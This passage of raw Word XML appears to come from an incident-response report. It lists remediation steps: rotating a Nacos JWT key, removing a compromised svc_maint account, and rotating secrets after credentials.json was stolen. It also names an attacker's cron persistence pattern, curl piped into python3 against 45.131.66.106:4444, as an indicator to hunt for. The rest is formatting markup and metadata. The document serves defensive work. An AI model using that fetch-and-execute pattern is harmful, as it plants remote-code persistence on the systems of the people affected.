        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rotate the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nacos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> JWT signing key, and review whether any accounts were created that weren't part of normal change control — I'd treat the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>svc_maint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> account specifically as fully compromised and remove it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362AE33E" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for the same </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> persistence pattern (curl piped into python3, pointed at 45.131.66.106:4444) on any other host that shares the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>langflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> service account or a similar one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265CA208" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Go back through the contents of the terraform-state </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MinIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bucket and rotate anything sensitive in there, since we confirmed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>credentials.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was already pulled out by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E0575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EC4312"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FA69864"/>
    <w:lvl w:ilvl="0" w:tplc="C76299DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E7D8D6D6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4B903D5A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="34FAEC32">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B8FE6538">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A01E18B4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2AD0E6A2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5DC81F7A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DBA63076">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5CC40D06"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97CE4194"/>
    <w:lvl w:ilvl="0" w:tplc="3A486C06">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C210530E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CD5246A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0E7E3BFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BE6487F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="908E3AD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DF1E3D0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04661CB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A0E620C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="255023186">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1644418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51"/>
    <w:rsid w:val="0020614E"/>
    <w:rsid w:val="007A0694"/>
    <w:rsid w:val="007F6034"/>
    <w:rsid w:val="00AC4B68"/>
    <w:rsid w:val="00E05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A19213"/>
  <w15:docId w15:val="{BE9EB41D-C24A-E447-BF4B-43547D78E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3138</Words>
  <Characters>17890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Vargas</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-15T10:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-15T10:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>